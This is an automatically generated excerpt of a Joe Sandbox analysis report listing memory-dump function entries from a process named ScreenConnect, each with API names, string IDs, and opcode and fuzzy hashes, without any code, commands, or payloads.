                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipeWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3146367894-0
                                                                                                                            • Opcode ID: 117c993ba6aa528f5a6d1905a885b9f7e3e1b699311c838994ea8d2ab816595d
                                                                                                                            • Instruction ID: 0ead40a24caf59ca1f2b4e223b385fca23faa06845d1f326332474928ee4eb49
                                                                                                                            • Opcode Fuzzy Hash: 117c993ba6aa528f5a6d1905a885b9f7e3e1b699311c838994ea8d2ab816595d
                                                                                                                            • Instruction Fuzzy Hash: 7E2144B680030A8FCB10CFAAC444BDEBBF5EB88324F10842DD859B7200D378A585CFA0
                                                                                                                            APIs
                                                                                                                            • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063A743E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3779259828-0
                                                                                                                            • Opcode ID: 4acbc60db3786ed1d673d2fef62ef38c7be0a126a51856ffb40ad75f957bbb06
                                                                                                                            • Instruction ID: 22f19f88071d5c49d8bd4847b7fea5467d14765ae6c185c3d5d928ac893e27bf
                                                                                                                            • Opcode Fuzzy Hash: 4acbc60db3786ed1d673d2fef62ef38c7be0a126a51856ffb40ad75f957bbb06
                                                                                                                            • Instruction Fuzzy Hash: 0E2100B5C003198FCB20CF9AC985BDEFBF4EB48324F14842AD459A7251D778A585CFA1
                                                                                                                            APIs
                                                                                                                            • WaitNamedPipeW.KERNEL32(00000000), ref: 05EA22EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: NamedPipeWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3146367894-0
                                                                                                                            • Opcode ID: 9e10924612d78eb5f6fc2ba54e8069ecdd7dd476177b1759bdd3a273ca3d3d51
                                                                                                                            • Instruction ID: 49ba6bc648fd883c03303cd49f3a0d696311af7ad56c3505788c3ecd8683e2bf
                                                                                                                            • Opcode Fuzzy Hash: 9e10924612d78eb5f6fc2ba54e8069ecdd7dd476177b1759bdd3a273ca3d3d51
                                                                                                                            • Instruction Fuzzy Hash: C72136B68002098FDB10CF9AC444BDEBBF4FB48324F10842DD859B7240C779A545CFA1
                                                                                                                            APIs
                                                                                                                            • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 063A743E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3597378854.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_63a0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSession
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3779259828-0
                                                                                                                            • Opcode ID: 788d9fcc8fe17a18964f1e8ecccc71e30134e2e86e5906cbab1e9c4801a8cb49
                                                                                                                            • Instruction ID: 14d53d96cdd4561c627edec4d4e555f093f552dd665487d8493412f53b9986de
                                                                                                                            • Opcode Fuzzy Hash: 788d9fcc8fe17a18964f1e8ecccc71e30134e2e86e5906cbab1e9c4801a8cb49
                                                                                                                            • Instruction Fuzzy Hash: A611F2B58003498FDB10CF9AC88479EBBF4EB48324F148469D558A7250D778A944CFA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 0-2564639436
                                                                                                                            • Opcode ID: 63ad64cb8a4eb88dd6a3e3c36501158b046d6088aa68ffaf3d38a1a02890344d
                                                                                                                            • Instruction ID: c5d4dbb663bf772f72172185ea8ef57947ce4500f324311a28683388bcf66650
                                                                                                                            • Opcode Fuzzy Hash: 63ad64cb8a4eb88dd6a3e3c36501158b046d6088aa68ffaf3d38a1a02890344d
                                                                                                                            • Instruction Fuzzy Hash: 7BC14834600612CFC714CF19C584DAABBF2FF88310B65C969E9598B6A5DB30FC86CB85
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: K{g
                                                                                                                            • API String ID: 0-1217214353
                                                                                                                            • Opcode ID: 053f923ab847dcab4ee98f739fdcfc0033ae9edbe0541b7df8995a6acbc80fe9
                                                                                                                            • Instruction ID: be6bc62a4ebf42a4f743b8d48123c3880f94959fdeacee339694aed4f7593e07
                                                                                                                            • Opcode Fuzzy Hash: 053f923ab847dcab4ee98f739fdcfc0033ae9edbe0541b7df8995a6acbc80fe9
                                                                                                                            • Instruction Fuzzy Hash: A271EC74E002299FCB68DB59D855BEDBBB6FB88300F1081A9E909E7350DB709D85CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: `Q^q
                                                                                                                            • API String ID: 0-1948671464
                                                                                                                            • Opcode ID: 64d5c49846921a683bc7aa9d6de1f3ccde93c9b727aa4cd8f6723fa3207713df
                                                                                                                            • Instruction ID: 3a5cc5c0fa9ccf291f2d8cd8cec765cc818e0fa6c7e90afdd8475595357aaef0
                                                                                                                            • Opcode Fuzzy Hash: 64d5c49846921a683bc7aa9d6de1f3ccde93c9b727aa4cd8f6723fa3207713df
                                                                                                                            • Instruction Fuzzy Hash: 1241C231B002198BDB58DB75D4557BEBAF6BB88300F248429D906E7384DF709D46CBA6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 0-3772416878
                                                                                                                            • Opcode ID: 939bbb34602189402fe8c392221f80ff10cf060cf9d29b31a5c0c1537d5fb9d3
                                                                                                                            • Instruction ID: 71627d7f8deac9e74f695de846fdd7dd0648e9ea012412945cc33b58170b3617
                                                                                                                            • Opcode Fuzzy Hash: 939bbb34602189402fe8c392221f80ff10cf060cf9d29b31a5c0c1537d5fb9d3
                                                                                                                            • Instruction Fuzzy Hash: A421D139B002208FCB18EB75D8546AEB7E6EB89611F14847DE907E7344EE35AC468B90
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 0-3772416878
                                                                                                                            • Opcode ID: 29c7915e5ecd083602f806e93b7aa9ec8003259705c375e12bf9c615f9b4a919
                                                                                                                            • Instruction ID: b695e6f67c6e737beb50838fd4801fcdbc772dbe5a6e6a1c7a201f8df5e81e33
                                                                                                                            • Opcode Fuzzy Hash: 29c7915e5ecd083602f806e93b7aa9ec8003259705c375e12bf9c615f9b4a919
                                                                                                                            • Instruction Fuzzy Hash: 3521E239B001208BCB18EB75D8549AEB7A6EBC9610F10847DD907E7344EE35AC028B90
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: S})m^
                                                                                                                            • API String ID: 0-3259043434
                                                                                                                            • Opcode ID: ad8e17112afa6bf4f14d1ea8a2b92249c5647e4d299826ef7b9954b4835ef58c
                                                                                                                            • Instruction ID: 5cf65e7a07626aba2c12ca7d530a7fd9e4fe95b841850b35f1addb319b4cb280
                                                                                                                            • Opcode Fuzzy Hash: ad8e17112afa6bf4f14d1ea8a2b92249c5647e4d299826ef7b9954b4835ef58c
                                                                                                                            • Instruction Fuzzy Hash: D4312A34A102188FCB19DF69D854A9DB7F6FF89315F5085AAD809E7320DB319E81CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: sdg
                                                                                                                            • API String ID: 0-2947517735
                                                                                                                            • Opcode ID: dd3607e33b32a7a71c10fb0fb3d053e4dbbd267e1abe6abceacd89bbdc60218f
                                                                                                                            • Instruction ID: 8fa464906ef5a3093fc9d7d82821699adf74e7ea44e03aec1a3c933e65bf54a4
                                                                                                                            • Opcode Fuzzy Hash: dd3607e33b32a7a71c10fb0fb3d053e4dbbd267e1abe6abceacd89bbdc60218f
                                                                                                                            • Instruction Fuzzy Hash: 621133322001195F8705DF59EC9199FBBAAFF84314754853AEA19DB310EB32ED1A8BD0
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 630f0ede1865e883ff61fdfc22026b337661c0f2053f78e3892ee744899540dd
                                                                                                                            • Instruction ID: 3fa78774718d1afde8ec13549bca6164878271edaf21e1a728d17e22e4da3ee7
                                                                                                                            • Opcode Fuzzy Hash: 630f0ede1865e883ff61fdfc22026b337661c0f2053f78e3892ee744899540dd
                                                                                                                            • Instruction Fuzzy Hash: 971158B580024A8FCB20CFA9C5457DEBBF4EB48324F208419D558A7340D378A584CFA5
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3595861023.0000000005EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5ea0000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2962429428-0
                                                                                                                            • Opcode ID: 362faa2f2f323cfc50f1e8e3b4fcce78b9d6ede44acca9c3930081b8d81a78ff
                                                                                                                            • Instruction ID: 0517baf0df7371373034a3d8bd6a305ef1880b34c4720a5edf3178e9687ea4fe
                                                                                                                            • Opcode Fuzzy Hash: 362faa2f2f323cfc50f1e8e3b4fcce78b9d6ede44acca9c3930081b8d81a78ff
                                                                                                                            • Instruction Fuzzy Hash: 541133B6800249CFCB20DF9AC545BDEBBF4EF48324F208469D558A7341D339A984CFA5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: [eg
                                                                                                                            • API String ID: 0-2162862910
                                                                                                                            • Opcode ID: a867dffc64042f627a0196ecb232a8cea5342bf5e239d242b2429c78cf2ccb61
                                                                                                                            • Instruction ID: 388595a55885ff7777ad6f15d23781e1b940c16657b9a0d5b999f9acec9d3040
                                                                                                                            • Opcode Fuzzy Hash: a867dffc64042f627a0196ecb232a8cea5342bf5e239d242b2429c78cf2ccb61
                                                                                                                            • Instruction Fuzzy Hash: C8F0A4733002045BC3019A69F99169AFBA5FBC43617908A3AD719CB214EF32DD4ACBD1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a94c8d6e086c20c643c18a4e32ef515591b473b9ed508887ab2e716dc48b8c74
                                                                                                                            • Instruction ID: a350015120c9973b371044f7c1163b266a93bd54180570a70e5d875d2d13bbd4
                                                                                                                            • Opcode Fuzzy Hash: a94c8d6e086c20c643c18a4e32ef515591b473b9ed508887ab2e716dc48b8c74
                                                                                                                            • Instruction Fuzzy Hash: FC325A35A00625CFDB54EF68C894A9DBBB2FF88304F108599E909AB365DB30ED85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 584434e5f829c3ba2b7e85a78eb6829c638cc0f56c7adc486a73f553b0b3f497
                                                                                                                            • Instruction ID: 1c95bffc1fa80bb50c45ef9ac6fcc0d888e714eff26d655f175e7fdbbd0787ae
                                                                                                                            • Opcode Fuzzy Hash: 584434e5f829c3ba2b7e85a78eb6829c638cc0f56c7adc486a73f553b0b3f497
                                                                                                                            • Instruction Fuzzy Hash: 33324B74A00615CFDB54EF68D894A9DBBB2FF88300F1085A9E909AB365DB31ED85CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 15ee32ce1f0e815cbc83ffdfcd84323a3f9a0d5e3472699f5053c631e8cb8c36
                                                                                                                            • Instruction ID: 3b8d872dc4b04bb543c1f24e90c6950a9b71069e898fc70642e4dc38b172912d
                                                                                                                            • Opcode Fuzzy Hash: 15ee32ce1f0e815cbc83ffdfcd84323a3f9a0d5e3472699f5053c631e8cb8c36
                                                                                                                            • Instruction Fuzzy Hash: 35A11E3590024ADFCB04DF69C580989BBF5FF85314B15C69AEC19AF325E771EA4ACB80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e3fbb18b1a46d6e183f1e7401c49a79c703f320df36996d5fb969e081431258e
                                                                                                                            • Instruction ID: 0ebe4b53d1b0d888550435f114023e50512ace07c342134267c32e7d9024ee7d
                                                                                                                            • Opcode Fuzzy Hash: e3fbb18b1a46d6e183f1e7401c49a79c703f320df36996d5fb969e081431258e
                                                                                                                            • Instruction Fuzzy Hash: 1F619F74B002158FCB04EF69D9909AEBBF6FF88310B148669D815DB364EB31DD86CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 85f308b777ef382aae74a473b9943fbe861b73bc5c73ab29a9795abcf7fd0643
                                                                                                                            • Instruction ID: 7f5745a8b3511a89c0e56f4c63be9d27de4512886056f664a2b598016549f8ba
                                                                                                                            • Opcode Fuzzy Hash: 85f308b777ef382aae74a473b9943fbe861b73bc5c73ab29a9795abcf7fd0643
                                                                                                                            • Instruction Fuzzy Hash: 56616070A002169FDB14CF6AC994A6ABFF6FF49304F158069EC15EB261D734EC45CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1f66af70168b7b69c04a1971785f53df53b9c0e0d62424b35b8996b79ea8a5f1
                                                                                                                            • Instruction ID: 49ae0548c2ad78bc4de4baffeb26a4c5f6fa9919ee751da6060a801aedd50b3e
                                                                                                                            • Opcode Fuzzy Hash: 1f66af70168b7b69c04a1971785f53df53b9c0e0d62424b35b8996b79ea8a5f1
                                                                                                                            • Instruction Fuzzy Hash: 32610570A102299FDB14DF99D969EAEBFF2BF44314F048458E801EB251DB78DD818F90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b056be12c96ecf09c73adb51f8749cfedc713699930a414ab90f909199c96791
                                                                                                                            • Instruction ID: 5fb961fd7361291c28eb60c797d61f23cfd2027227918eae50b71071e4106377
                                                                                                                            • Opcode Fuzzy Hash: b056be12c96ecf09c73adb51f8749cfedc713699930a414ab90f909199c96791
                                                                                                                            • Instruction Fuzzy Hash: 7D51F3729083948FCB01EF7CC4542AA7FB2EF85314B0944AEC445DB256DB35DC86CB92
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: b119d82c37d687ff2cf8d1c5d2c497cded06422cb003fe668b361e461db3d089
                                                                                                                            • Instruction ID: 8834a8fa5468629f16d5a00d66e89e98572e6451511d4b1295ce0dfbab01d92e
                                                                                                                            • Opcode Fuzzy Hash: b119d82c37d687ff2cf8d1c5d2c497cded06422cb003fe668b361e461db3d089
                                                                                                                            • Instruction Fuzzy Hash: A9613D34A012298FDB14DF28C955BA9BBB2FF85304F108499E809EB361DB759DC1CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 63ce9c1f262e548f898876c81bd3a755a99b4c5303729584292dd372d2a92b84
                                                                                                                            • Instruction ID: 69b53be72b2f605f3d569125e4ac607419610384c0d12b1a20d701a90a55593b
                                                                                                                            • Opcode Fuzzy Hash: 63ce9c1f262e548f898876c81bd3a755a99b4c5303729584292dd372d2a92b84
                                                                                                                            • Instruction Fuzzy Hash: FF515074B002168FCB05DF69D9909AEFBF6FF88300B148669D915EB364EB30DD468B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 83f1b79225a0d7ea465fc40e61515fcf5660f58bb0f691c357106223ad187787
                                                                                                                            • Instruction ID: 7863ececa42dd9e8cb833948a4e8b9af81c056cd91e7ebef1ed1c54590e16a5a
                                                                                                                            • Opcode Fuzzy Hash: 83f1b79225a0d7ea465fc40e61515fcf5660f58bb0f691c357106223ad187787
                                                                                                                            • Instruction Fuzzy Hash: 3A41A331E006198BCB15DFA8C8506EEBBB2FF89300F20856ED906FB251DB359D46C7A1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dfa7ef5eb8f1dba69cc6ed337b50d19056555e2f62e00b953d233749bbe9924d
                                                                                                                            • Instruction ID: 57c5ebb9a9f714c2bbdb8f952fa5757ba95fc912cdf942d060bfaf6398c98e78
                                                                                                                            • Opcode Fuzzy Hash: dfa7ef5eb8f1dba69cc6ed337b50d19056555e2f62e00b953d233749bbe9924d
                                                                                                                            • Instruction Fuzzy Hash: 70415431600B15ABC734CE29D85056EBBF6EF44710B108B2DE866C7AD0DB30FC458B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: acefc3bf0fc134e6eea467ff6a9c4bbfe5e3694da8bfd70694af9fbf84c87a92
                                                                                                                            • Instruction ID: d32c9bbe8d88cb4eda9873e2a120733d45317ac20a6a7ae6ba9421b0937d7047
                                                                                                                            • Opcode Fuzzy Hash: acefc3bf0fc134e6eea467ff6a9c4bbfe5e3694da8bfd70694af9fbf84c87a92
                                                                                                                            • Instruction Fuzzy Hash: 75412934600616CFCB14CF58C584DAABBF2FF89310B2A8569E959DB261D731FD46CB84
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2d5410c9a33cc0d977503207ba906ea5b05962864e2b580e82a6f202486baf18
                                                                                                                            • Instruction ID: ece22c1f2602ac79e98388c4a4e62d2224a04689e923cdd66a53718bbdecec70
                                                                                                                            • Opcode Fuzzy Hash: 2d5410c9a33cc0d977503207ba906ea5b05962864e2b580e82a6f202486baf18
                                                                                                                            • Instruction Fuzzy Hash: 1431A331A003199BEF14DF71C8557EEBBF6BF84700F108529E905EB290EB759985CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 65f52753c54dd9e7f456569d3c14577f6bc61294a6aac417767433399af81fb4
                                                                                                                            • Instruction ID: 1077ba6c26560941aa7d0d6c67053c8ab1ef8a0c56c894ef866c3b12f8b1ee0a
                                                                                                                            • Opcode Fuzzy Hash: 65f52753c54dd9e7f456569d3c14577f6bc61294a6aac417767433399af81fb4
                                                                                                                            • Instruction Fuzzy Hash: 6231D331A003189BEF14CF61C855BEEBBB6BF88300F108529E905EB290EB759D85CB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f7e79481edf21469d9dbdb6c98290f06a066d899574a117fb5f840bf40c0d89d
                                                                                                                            • Instruction ID: 423bef7d6c710b2178a7f93722782d17d9b418ede3853a5a7e79b8af5ecb9623
                                                                                                                            • Opcode Fuzzy Hash: f7e79481edf21469d9dbdb6c98290f06a066d899574a117fb5f840bf40c0d89d
                                                                                                                            • Instruction Fuzzy Hash: 5841E834A01225DFDF24DF65D988AAC7BB2FF85325F1042A9E815EB3A4DB359D80CB10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c09f76644ee686203295396db1984bfb7193c5c8f006d87887625b87d9e59657
                                                                                                                            • Instruction ID: a98740a04987519f6524a44913831a5ed13e8b5658c83275599c4510d6894a28
                                                                                                                            • Opcode Fuzzy Hash: c09f76644ee686203295396db1984bfb7193c5c8f006d87887625b87d9e59657
                                                                                                                            • Instruction Fuzzy Hash: E0415E71A003048FCB14DF78C99469EBBF2FF88310B15856DD509EB255DB35ED428B91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000007.00000002.3594388392.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_7_2_5820000_ScreenConnect.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 60c91d06d9438d8a147fe497715774c0d0d171710aea0f4b8f8a46a258504e76
                                                                                                                            • Instruction ID: 47e128cb4a0e21ddeb08739980bbb4f3c001873a0a600fd656f8eeac9679bc9b
                                                                                                                            • Opcode Fuzzy Hash: 60c91d06d9438d8a147fe497715774c0d0d171710aea0f4b8f8a46a258504e76
                                                                                                                            • Instruction Fuzzy Hash: 3A31FB767443208FC729DB24D950A6A7BF2FF89714B01489AE906CB365DB31EC85CBA0
                                                                                                                            Memory Dump Source
